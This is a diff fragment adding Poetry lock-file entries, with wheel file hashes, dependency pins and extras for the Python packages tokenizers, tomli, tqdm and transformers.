+ {file = "tokenizers-0.20.3-cp313-none-win32.whl", hash = "sha256:6e19e0f1d854d6ab7ea0c743d06e764d1d9a546932be0a67f33087645f00fe13"},
+ {file = "tokenizers-0.20.3-cp313-none-win_amd64.whl", hash = "sha256:d50ede425c7e60966a9680d41b58b3a0950afa1bb570488e2972fa61662c4273"},
+ {file = "tokenizers-0.20.3-cp37-cp37m-macosx_10_12_x86_64.whl", hash = "sha256:9adda1ff5fb9dcdf899ceca672a4e2ce9e797adb512a6467305ca3d8bfcfbdd0"},
+ {file = "tokenizers-0.20.3-cp37-cp37m-macosx_11_0_arm64.whl", hash = "sha256:6dde2cae6004ba7a3badff4a11911cae03ebf23e97eebfc0e71fef2530e5074f"},
+ {file = "tokenizers-0.20.3-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c4a7fd678b35614fca708579eb95b7587a5e8a6d328171bd2488fd9f27d82be4"},
+ {file = "tokenizers-0.20.3-cp37-cp37m-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:1b80e3c7283a01a356bd2210f53d1a4a5d32b269c2024389ed0173137708d50e"},
+ {file = "tokenizers-0.20.3-cp37-cp37m-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:a8cc0e8176b762973758a77f0d9c4467d310e33165fb74173418ca3734944da4"},
+ {file = "tokenizers-0.20.3-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:d5634b2e2f5f3d2b4439d2d74066e22eb4b1f04f3fea05cb2a3c12d89b5a3bcd"},
+ {file = "tokenizers-0.20.3-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:b4ba635165bc1ea46f2da8e5d80b5f70f6ec42161e38d96dbef33bb39df73964"},
+ {file = "tokenizers-0.20.3-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:18e4c7c64172e7789bd8b07aa3087ea87c4c4de7e90937a2aa036b5d92332536"},
+ {file = "tokenizers-0.20.3-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:1f74909ef7675c26d4095a817ec3393d67f3158ca4836c233212e5613ef640c4"},
+ {file = "tokenizers-0.20.3-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:0e9b81321a1e05b16487d312b4264984513f8b4a7556229cafac6e88c2036b09"},
+ {file = "tokenizers-0.20.3-cp37-none-win32.whl", hash = "sha256:ab48184cd58b4a03022a2ec75b54c9f600ffea9a733612c02325ed636f353729"},
+ {file = "tokenizers-0.20.3-cp37-none-win_amd64.whl", hash = "sha256:60ac483cebee1c12c71878523e768df02fa17e4c54412966cb3ac862c91b36c1"},
+ {file = "tokenizers-0.20.3-cp38-cp38-macosx_10_12_x86_64.whl", hash = "sha256:3229ef103c89583d10b9378afa5d601b91e6337530a0988e17ca8d635329a996"},
+ {file = "tokenizers-0.20.3-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:6ac52cc24bad3de865c7e65b1c4e7b70d00938a8ae09a92a453b8f676e714ad5"},
+ {file = "tokenizers-0.20.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:04627b7b502fa6a2a005e1bd446fa4247d89abcb1afaa1b81eb90e21aba9a60f"},
+ {file = "tokenizers-0.20.3-cp38-cp38-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:c27ceb887f0e81a3c377eb4605dca7a95a81262761c0fba308d627b2abb98f2b"},
+ {file = "tokenizers-0.20.3-cp38-cp38-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:65ab780194da4e1fcf5670523a2f377c4838ebf5249efe41fa1eddd2a84fb49d"},
+ {file = "tokenizers-0.20.3-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:98d343134f47159e81f7f242264b0eb222e6b802f37173c8d7d7b64d5c9d1388"},
+ {file = "tokenizers-0.20.3-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f2475bb004ab2009d29aff13b5047bfdb3d4b474f0aa9d4faa13a7f34dbbbb43"},
+ {file = "tokenizers-0.20.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7b6583a65c01db1197c1eb36857ceba8ec329d53afadd268b42a6b04f4965724"},
+ {file = "tokenizers-0.20.3-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:62d00ba208358c037eeab7bfc00a905adc67b2d31b68ab40ed09d75881e114ea"},
+ {file = "tokenizers-0.20.3-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:0fc7a39e5bedc817bda395a798dfe2d9c5f7c71153c90d381b5135a0328d9520"},
+ {file = "tokenizers-0.20.3-cp38-none-win32.whl", hash = "sha256:84d40ee0f8550d64d3ea92dd7d24a8557a9172165bdb986c9fb2503b4fe4e3b6"},
+ {file = "tokenizers-0.20.3-cp38-none-win_amd64.whl", hash = "sha256:205a45246ed7f1718cf3785cff88450ba603352412aaf220ace026384aa3f1c0"},
+ {file = "tokenizers-0.20.3-cp39-cp39-macosx_10_12_x86_64.whl", hash = "sha256:93e37f0269a11dc3b1a953f1fca9707f0929ebf8b4063c591c71a0664219988e"},
+ {file = "tokenizers-0.20.3-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:f4cb0c614b0135e781de96c2af87e73da0389ac1458e2a97562ed26e29490d8d"},
+ {file = "tokenizers-0.20.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:7eb2fb1c432f5746b22f8a7f09fc18c4156cb0031c77f53cb19379d82d43297a"},
+ {file = "tokenizers-0.20.3-cp39-cp39-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:bfa8d029bb156181b006643309d6b673615a24e4ed24cf03aa191d599b996f51"},
+ {file = "tokenizers-0.20.3-cp39-cp39-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6f90549622de3bf476ad9f1dd6f3f952ec3ed6ab8615ae88ef060d0c5bfad55d"},
+ {file = "tokenizers-0.20.3-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:a1d469c74eebf5c43fd61cd9b030e271d17198edd7bd45392e03a3c091d7d6d4"},
+ {file = "tokenizers-0.20.3-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:bee8f53b2594749f4460d53253bae55d718f04e9b633efa0f5df8938bd98e4f0"},
+ {file = "tokenizers-0.20.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:938441babf3e5720e4459e306ef2809fb267680df9d1ff2873458b22aef60248"},
+ {file = "tokenizers-0.20.3-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:7310ab23d7b0caebecc0e8be11a1146f320f5f07284000f6ea54793e83de1b75"},
+ {file = "tokenizers-0.20.3-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:16121eb030a2b13094cfec936b0c12e8b4063c5f839591ea7d0212336d8f9921"},
+ {file = "tokenizers-0.20.3-cp39-none-win32.whl", hash = "sha256:401cc21ef642ee235985d747f65e18f639464d377c70836c9003df208d582064"},
+ {file = "tokenizers-0.20.3-cp39-none-win_amd64.whl", hash = "sha256:7498f3ea7746133335a6adb67a77cf77227a8b82c8483f644a2e5f86fea42b8d"},
+ {file = "tokenizers-0.20.3-pp310-pypy310_pp73-macosx_10_12_x86_64.whl", hash = "sha256:e919f2e3e68bb51dc31de4fcbbeff3bdf9c1cad489044c75e2b982a91059bd3c"},
+ {file = "tokenizers-0.20.3-pp310-pypy310_pp73-macosx_11_0_arm64.whl", hash = "sha256:b8e9608f2773996cc272156e305bd79066163a66b0390fe21750aff62df1ac07"},
+ {file = "tokenizers-0.20.3-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:39270a7050deaf50f7caff4c532c01b3c48f6608d42b3eacdebdc6795478c8df"},
+ {file = "tokenizers-0.20.3-pp310-pypy310_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:e005466632b1c5d2d2120f6de8aa768cc9d36cd1ab7d51d0c27a114c91a1e6ee"},
+ {file = "tokenizers-0.20.3-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a07962340b36189b6c8feda552ea1bfeee6cf067ff922a1d7760662c2ee229e5"},
+ {file = "tokenizers-0.20.3-pp310-pypy310_pp73-musllinux_1_1_aarch64.whl", hash = "sha256:55046ad3dd5f2b3c67501fcc8c9cbe3e901d8355f08a3b745e9b57894855f85b"},
+ {file = "tokenizers-0.20.3-pp310-pypy310_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:efcf0eb939988b627558aaf2b9dc3e56d759cad2e0cfa04fcab378e4b48fc4fd"},
+ {file = "tokenizers-0.20.3-pp37-pypy37_pp73-macosx_10_12_x86_64.whl", hash = "sha256:f3558a7ae6a6d38a77dfce12172a1e2e1bf3e8871e744a1861cd7591ea9ebe24"},
+ {file = "tokenizers-0.20.3-pp37-pypy37_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4d53029fe44bc70c3ff14ef512460a0cf583495a0f8e2f4b70e26eb9438e38a9"},
+ {file = "tokenizers-0.20.3-pp37-pypy37_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:57a2a56397b2bec5a629b516b23f0f8a3e4f978c7488d4a299980f8375954b85"},
+ {file = "tokenizers-0.20.3-pp37-pypy37_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b1e5bfaae740ef9ece000f8a07e78ac0e2b085c5ce9648f8593ddf0243c9f76d"},
+ {file = "tokenizers-0.20.3-pp37-pypy37_pp73-musllinux_1_1_aarch64.whl", hash = "sha256:fbaf3ea28fedfb2283da60e710aff25492e795a7397cad8a50f1e079b65a5a70"},
+ {file = "tokenizers-0.20.3-pp37-pypy37_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:c47c037116310dc976eb96b008e41b9cfaba002ed8005848d4d632ee0b7ba9ae"},
+ {file = "tokenizers-0.20.3-pp38-pypy38_pp73-macosx_10_12_x86_64.whl", hash = "sha256:c31751f0721f58f5e19bb27c1acc259aeff860d8629c4e1a900b26a1979ada8e"},
+ {file = "tokenizers-0.20.3-pp38-pypy38_pp73-macosx_11_0_arm64.whl", hash = "sha256:c697cbd3be7a79ea250ea5f380d6f12e534c543cfb137d5c734966b3ee4f34cc"},
+ {file = "tokenizers-0.20.3-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b48971b88ef9130bf35b41b35fd857c3c4dae4a9cd7990ebc7fc03e59cc92438"},
+ {file = "tokenizers-0.20.3-pp38-pypy38_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:4e615de179bbe060ab33773f0d98a8a8572b5883dd7dac66c1de8c056c7e748c"},
+ {file = "tokenizers-0.20.3-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:da1ec842035ed9999c62e45fbe0ff14b7e8a7e02bb97688cc6313cf65e5cd755"},
+ {file = "tokenizers-0.20.3-pp38-pypy38_pp73-musllinux_1_1_aarch64.whl", hash = "sha256:6ee4954c1dd23aadc27958dad759006e71659d497dcb0ef0c7c87ea992c16ebd"},
+ {file = "tokenizers-0.20.3-pp38-pypy38_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:3eda46ca402751ec82553a321bf35a617b76bbed7586e768c02ccacbdda94d6d"},
+ {file = "tokenizers-0.20.3-pp39-pypy39_pp73-macosx_10_12_x86_64.whl", hash = "sha256:de082392a85eb0055cc055c535bff2f0cc15d7a000bdc36fbf601a0f3cf8507a"},
+ {file = "tokenizers-0.20.3-pp39-pypy39_pp73-macosx_11_0_arm64.whl", hash = "sha256:c3db46cc0647bfd88263afdb739b92017a02a87ee30945cb3e86c7e25c7c9917"},
+ {file = "tokenizers-0.20.3-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a292392f24ab9abac5cfa8197e5a6208f2e43723420217e1ceba0b4ec77816ac"},
+ {file = "tokenizers-0.20.3-pp39-pypy39_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8dcd91f4e60f62b20d83a87a84fe062035a1e3ff49a8c2bbdeb2d441c8e311f4"},
+ {file = "tokenizers-0.20.3-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:900991a2b8ee35961b1095db7e265342e0e42a84c1a594823d5ee9f8fb791958"},
+ {file = "tokenizers-0.20.3-pp39-pypy39_pp73-musllinux_1_1_aarch64.whl", hash = "sha256:5a8d8261ca2133d4f98aa9627c748189502b3787537ba3d7e2beb4f7cfc5d627"},
+ {file = "tokenizers-0.20.3-pp39-pypy39_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:c4fd4d71e6deb6ddf99d8d0eab87d1d16f635898906e631914a9bae8ae9f2cfb"},
+ {file = "tokenizers-0.20.3.tar.gz", hash = "sha256:2278b34c5d0dd78e087e1ca7f9b1dcbf129d80211afa645f214bd6e051037539"},
+]
+
+[package.dependencies]
+huggingface-hub = ">=0.16.4,<1.0"
+
+[package.extras]
+dev = ["tokenizers[testing]"]
+docs = ["setuptools-rust", "sphinx", "sphinx-rtd-theme"]
+testing = ["black (==22.3)", "datasets", "numpy", "pytest", "requests", "ruff"]
+
+[[package]]
+name = "tomli"
+version = "2.2.1"
+description = "A lil' TOML parser"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "tomli-2.2.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:678e4fa69e4575eb77d103de3df8a895e1591b48e740211bd1067378c69e8249"},
+ {file = "tomli-2.2.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:023aa114dd824ade0100497eb2318602af309e5a55595f76b626d6d9f3b7b0a6"},
+ {file = "tomli-2.2.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ece47d672db52ac607a3d9599a9d48dcb2f2f735c6c2d1f34130085bb12b112a"},
+ {file = "tomli-2.2.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6972ca9c9cc9f0acaa56a8ca1ff51e7af152a9f87fb64623e31d5c83700080ee"},
+ {file = "tomli-2.2.1-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c954d2250168d28797dd4e3ac5cf812a406cd5a92674ee4c8f123c889786aa8e"},
+ {file = "tomli-2.2.1-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:8dd28b3e155b80f4d54beb40a441d366adcfe740969820caf156c019fb5c7ec4"},
+ {file = "tomli-2.2.1-cp311-cp311-musllinux_1_2_i686.whl", hash = "sha256:e59e304978767a54663af13c07b3d1af22ddee3bb2fb0618ca1593e4f593a106"},
+ {file = "tomli-2.2.1-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:33580bccab0338d00994d7f16f4c4ec25b776af3ffaac1ed74e0b3fc95e885a8"},
+ {file = "tomli-2.2.1-cp311-cp311-win32.whl", hash = "sha256:465af0e0875402f1d226519c9904f37254b3045fc5084697cefb9bdde1ff99ff"},
+ {file = "tomli-2.2.1-cp311-cp311-win_amd64.whl", hash = "sha256:2d0f2fdd22b02c6d81637a3c95f8cd77f995846af7414c5c4b8d0545afa1bc4b"},
+ {file = "tomli-2.2.1-cp312-cp312-macosx_10_13_x86_64.whl", hash = "sha256:4a8f6e44de52d5e6c657c9fe83b562f5f4256d8ebbfe4ff922c495620a7f6cea"},
+ {file = "tomli-2.2.1-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:8d57ca8095a641b8237d5b079147646153d22552f1c637fd3ba7f4b0b29167a8"},
+ {file = "tomli-2.2.1-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4e340144ad7ae1533cb897d406382b4b6fede8890a03738ff1683af800d54192"},
+ {file = "tomli-2.2.1-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:db2b95f9de79181805df90bedc5a5ab4c165e6ec3fe99f970d0e302f384ad222"},
+ {file = "tomli-2.2.1-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:40741994320b232529c802f8bc86da4e1aa9f413db394617b9a256ae0f9a7f77"},
+ {file = "tomli-2.2.1-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:400e720fe168c0f8521520190686ef8ef033fb19fc493da09779e592861b78c6"},
+ {file = "tomli-2.2.1-cp312-cp312-musllinux_1_2_i686.whl", hash = "sha256:02abe224de6ae62c19f090f68da4e27b10af2b93213d36cf44e6e1c5abd19fdd"},
+ {file = "tomli-2.2.1-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:b82ebccc8c8a36f2094e969560a1b836758481f3dc360ce9a3277c65f374285e"},
+ {file = "tomli-2.2.1-cp312-cp312-win32.whl", hash = "sha256:889f80ef92701b9dbb224e49ec87c645ce5df3fa2cc548664eb8a25e03127a98"},
+ {file = "tomli-2.2.1-cp312-cp312-win_amd64.whl", hash = "sha256:7fc04e92e1d624a4a63c76474610238576942d6b8950a2d7f908a340494e67e4"},
+ {file = "tomli-2.2.1-cp313-cp313-macosx_10_13_x86_64.whl", hash = "sha256:f4039b9cbc3048b2416cc57ab3bda989a6fcf9b36cf8937f01a6e731b64f80d7"},
+ {file = "tomli-2.2.1-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:286f0ca2ffeeb5b9bd4fcc8d6c330534323ec51b2f52da063b11c502da16f30c"},
+ {file = "tomli-2.2.1-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a92ef1a44547e894e2a17d24e7557a5e85a9e1d0048b0b5e7541f76c5032cb13"},
+ {file = "tomli-2.2.1-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9316dc65bed1684c9a98ee68759ceaed29d229e985297003e494aa825ebb0281"},
+ {file = "tomli-2.2.1-cp313-cp313-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:e85e99945e688e32d5a35c1ff38ed0b3f41f43fad8df0bdf79f72b2ba7bc5272"},
+ {file = "tomli-2.2.1-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:ac065718db92ca818f8d6141b5f66369833d4a80a9d74435a268c52bdfa73140"},
+ {file = "tomli-2.2.1-cp313-cp313-musllinux_1_2_i686.whl", hash = "sha256:d920f33822747519673ee656a4b6ac33e382eca9d331c87770faa3eef562aeb2"},
+ {file = "tomli-2.2.1-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:a198f10c4d1b1375d7687bc25294306e551bf1abfa4eace6650070a5c1ae2744"},
+ {file = "tomli-2.2.1-cp313-cp313-win32.whl", hash = "sha256:d3f5614314d758649ab2ab3a62d4f2004c825922f9e370b29416484086b264ec"},
+ {file = "tomli-2.2.1-cp313-cp313-win_amd64.whl", hash = "sha256:a38aa0308e754b0e3c67e344754dff64999ff9b513e691d0e786265c93583c69"},
+ {file = "tomli-2.2.1-py3-none-any.whl", hash = "sha256:cb55c73c5f4408779d0cf3eef9f762b9c9f147a77de7b258bef0a5628adc85cc"},
+ {file = "tomli-2.2.1.tar.gz", hash = "sha256:cd45e1dc79c835ce60f7404ec8119f2eb06d38b1deba146f07ced3bbc44505ff"},
+]
+
+[[package]]
+name = "tqdm"
+version = "4.67.1"
+description = "Fast, Extensible Progress Meter"
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "tqdm-4.67.1-py3-none-any.whl", hash = "sha256:26445eca388f82e72884e0d580d5464cd801a3ea01e63e5601bdff9ba6a48de2"},
+ {file = "tqdm-4.67.1.tar.gz", hash = "sha256:f8aef9c52c08c13a65f30ea34f4e5aac3fd1a34959879d7e59e63027286627f2"},
+]
+
+[package.dependencies]
+colorama = {version = "*", markers = "platform_system == \"Windows\""}
+
+[package.extras]
+dev = ["nbval", "pytest (>=6)", "pytest-asyncio (>=0.24)", "pytest-cov", "pytest-timeout"]
+discord = ["requests"]
+notebook = ["ipywidgets (>=6)"]
+slack = ["slack-sdk"]
+telegram = ["requests"]
+
+[[package]]
+name = "transformers"
+version = "4.46.3"
+description = "State-of-the-art Machine Learning for JAX, PyTorch and TensorFlow"
+optional = false
+python-versions = ">=3.8.0"
+files = [
+ {file = "transformers-4.46.3-py3-none-any.whl", hash = "sha256:a12ef6f52841fd190a3e5602145b542d03507222f2c64ebb7ee92e8788093aef"},
+ {file = "transformers-4.46.3.tar.gz", hash = "sha256:8ee4b3ae943fe33e82afff8e837f4b052058b07ca9be3cb5b729ed31295f72cc"},
+]
+
+[package.dependencies]
+filelock = "*"
+huggingface-hub = ">=0.23.2,<1.0"
+numpy = ">=1.17"
+packaging = ">=20.0"
+pyyaml = ">=5.1"
+regex = "!=2019.12.17"
+requests = "*"
+safetensors = ">=0.4.1"
+tokenizers = ">=0.20,<0.21"
+tqdm = ">=4.27"
+
+[package.extras]
+accelerate = ["accelerate (>=0.26.0)"]
+agents = ["Pillow (>=10.0.1,<=15.0)", "accelerate (>=0.26.0)", "datasets (!=2.5.0)", "diffusers", "opencv-python", "sentencepiece (>=0.1.91,!=0.1.92)", "torch"]
+all = ["Pillow (>=10.0.1,<=15.0)", "accelerate (>=0.26.0)", "av (==9.2.0)", "codecarbon (==1.2.0)", "flax (>=0.4.1,<=0.7.0)", "jax (>=0.4.1,<=0.4.13)", "jaxlib (>=0.4.1,<=0.4.13)", "kenlm", "keras-nlp (>=0.3.1,<0.14.0)", "librosa", "onnxconverter-common", "optax (>=0.0.8,<=0.1.4)", "optuna", "phonemizer", "protobuf", "pyctcdecode (>=0.4.0)", "ray[tune] (>=2.7.0)", "scipy (<1.13.0)", "sentencepiece (>=0.1.91,!=0.1.92)", "sigopt", "tensorflow (>2.9,<2.16)", "tensorflow-text (<2.16)", "tf2onnx", "timm (<=0.9.16)", "tokenizers (>=0.20,<0.21)", "torch", "torchaudio", "torchvision"]
+audio = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)"]
+benchmark = ["optimum-benchmark (>=0.3.0)"]
+codecarbon = ["codecarbon (==1.2.0)"]
+deepspeed = ["accelerate (>=0.26.0)", "deepspeed (>=0.9.3)"]
+deepspeed-testing = ["GitPython (<3.1.19)", "accelerate (>=0.26.0)", "beautifulsoup4", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "deepspeed (>=0.9.3)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "nltk (<=3.8.1)", "optuna", "parameterized", "protobuf", "psutil", "pydantic", "pytest (>=7.2.0,<8.0.0)", "pytest-rich", "pytest-timeout", "pytest-xdist", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "ruff (==0.5.1)", "sacrebleu (>=1.4.12,<2.0.0)", "sacremoses", "sentencepiece (>=0.1.91,!=0.1.92)", "tensorboard", "timeout-decorator"]
+dev = ["GitPython (<3.1.19)", "Pillow (>=10.0.1,<=15.0)", "accelerate (>=0.26.0)", "av (==9.2.0)", "beautifulsoup4", "codecarbon (==1.2.0)", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "flax (>=0.4.1,<=0.7.0)", "fugashi (>=1.0)", "ipadic (>=1.0.0,<2.0)", "isort (>=5.5.4)", "jax (>=0.4.1,<=0.4.13)", "jaxlib (>=0.4.1,<=0.4.13)", "kenlm", "keras-nlp (>=0.3.1,<0.14.0)", "libcst", "librosa", "nltk (<=3.8.1)", "onnxconverter-common", "optax (>=0.0.8,<=0.1.4)", "optuna", "parameterized", "phonemizer", "protobuf", "psutil", "pyctcdecode (>=0.4.0)", "pydantic", "pytest (>=7.2.0,<8.0.0)", "pytest-rich", "pytest-timeout", "pytest-xdist", "ray[tune] (>=2.7.0)", "rhoknp (>=1.1.0,<1.3.1)", "rich", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "ruff (==0.5.1)", "sacrebleu (>=1.4.12,<2.0.0)", "sacremoses", "scikit-learn", "scipy (<1.13.0)", "sentencepiece (>=0.1.91,!=0.1.92)", "sigopt", "sudachidict-core (>=20220729)", "sudachipy (>=0.6.6)", "tensorboard", "tensorflow (>2.9,<2.16)", "tensorflow-text (<2.16)", "tf2onnx", "timeout-decorator", "timm (<=0.9.16)", "tokenizers (>=0.20,<0.21)", "torch", "torchaudio", "torchvision", "unidic (>=1.0.2)", "unidic-lite (>=1.0.7)", "urllib3 (<2.0.0)"]
+dev-tensorflow = ["GitPython (<3.1.19)", "Pillow (>=10.0.1,<=15.0)", "beautifulsoup4", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "isort (>=5.5.4)", "kenlm", "keras-nlp (>=0.3.1,<0.14.0)", "libcst", "librosa", "nltk (<=3.8.1)", "onnxconverter-common", "onnxruntime (>=1.4.0)", "onnxruntime-tools (>=1.4.2)", "parameterized", "phonemizer", "protobuf", "psutil", "pyctcdecode (>=0.4.0)", "pydantic", "pytest (>=7.2.0,<8.0.0)", "pytest-rich", "pytest-timeout", "pytest-xdist", "rich", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "ruff (==0.5.1)", "sacrebleu (>=1.4.12,<2.0.0)", "sacremoses", "scikit-learn", "sentencepiece (>=0.1.91,!=0.1.92)", "tensorboard", "tensorflow (>2.9,<2.16)", "tensorflow-text (<2.16)", "tf2onnx", "timeout-decorator", "tokenizers (>=0.20,<0.21)", "urllib3 (<2.0.0)"]
+dev-torch = ["GitPython (<3.1.19)", "Pillow (>=10.0.1,<=15.0)", "accelerate (>=0.26.0)", "beautifulsoup4", "codecarbon (==1.2.0)", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "fugashi (>=1.0)", "ipadic (>=1.0.0,<2.0)", "isort (>=5.5.4)", "kenlm", "libcst", "librosa", "nltk (<=3.8.1)", "onnxruntime (>=1.4.0)", "onnxruntime-tools (>=1.4.2)", "optuna", "parameterized", "phonemizer", "protobuf", "psutil", "pyctcdecode (>=0.4.0)", "pydantic", "pytest (>=7.2.0,<8.0.0)", "pytest-rich", "pytest-timeout", "pytest-xdist", "ray[tune] (>=2.7.0)", "rhoknp (>=1.1.0,<1.3.1)", "rich", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "ruff (==0.5.1)", "sacrebleu (>=1.4.12,<2.0.0)", "sacremoses", "scikit-learn", "sentencepiece (>=0.1.91,!=0.1.92)", "sigopt", "sudachidict-core (>=20220729)", "sudachipy (>=0.6.6)", "tensorboard", "timeout-decorator", "timm (<=0.9.16)", "tokenizers (>=0.20,<0.21)", "torch", "torchaudio", "torchvision", "unidic (>=1.0.2)", "unidic-lite (>=1.0.7)", "urllib3 (<2.0.0)"]
+flax = ["flax (>=0.4.1,<=0.7.0)", "jax (>=0.4.1,<=0.4.13)", "jaxlib (>=0.4.1,<=0.4.13)", "optax (>=0.0.8,<=0.1.4)", "scipy (<1.13.0)"]
+flax-speech = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)"]
+ftfy = ["ftfy"]
+integrations = ["optuna", "ray[tune] (>=2.7.0)", "sigopt"]
+ja = ["fugashi (>=1.0)", "ipadic (>=1.0.0,<2.0)", "rhoknp (>=1.1.0,<1.3.1)", "sudachidict-core (>=20220729)", "sudachipy (>=0.6.6)", "unidic (>=1.0.2)", "unidic-lite (>=1.0.7)"]
+modelcreation = ["cookiecutter (==1.7.3)"]
+natten = ["natten (>=0.14.6,<0.15.0)"]
+onnx = ["onnxconverter-common", "onnxruntime (>=1.4.0)", "onnxruntime-tools (>=1.4.2)", "tf2onnx"]
+onnxruntime = ["onnxruntime (>=1.4.0)", "onnxruntime-tools (>=1.4.2)"]
+optuna = ["optuna"]
+quality = ["GitPython (<3.1.19)", "datasets (!=2.5.0)", "isort (>=5.5.4)", "libcst", "rich", "ruff (==0.5.1)", "urllib3 (<2.0.0)"]
+ray = ["ray[tune] (>=2.7.0)"]
+retrieval = ["datasets (!=2.5.0)", "faiss-cpu"]
+ruff = ["ruff (==0.5.1)"]
+sagemaker = ["sagemaker (>=2.31.0)"]
+sentencepiece = ["protobuf", "sentencepiece (>=0.1.91,!=0.1.92)"]
+serving = ["fastapi", "pydantic", "starlette", "uvicorn"]
+sigopt = ["sigopt"]
+sklearn = ["scikit-learn"]
+speech = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)", "torchaudio"]
+testing = ["GitPython (<3.1.19)", "beautifulsoup4", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "nltk (<=3.8.1)", "parameterized", "psutil", "pydantic", "pytest (>=7.2.0,<8.0.0)", "pytest-rich", "pytest-timeout", "pytest-xdist", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "ruff (==0.5.1)", "sacrebleu (>=1.4.12,<2.0.0)", "sacremoses", "sentencepiece (>=0.1.91,!=0.1.92)", "tensorboard", "timeout-decorator"]
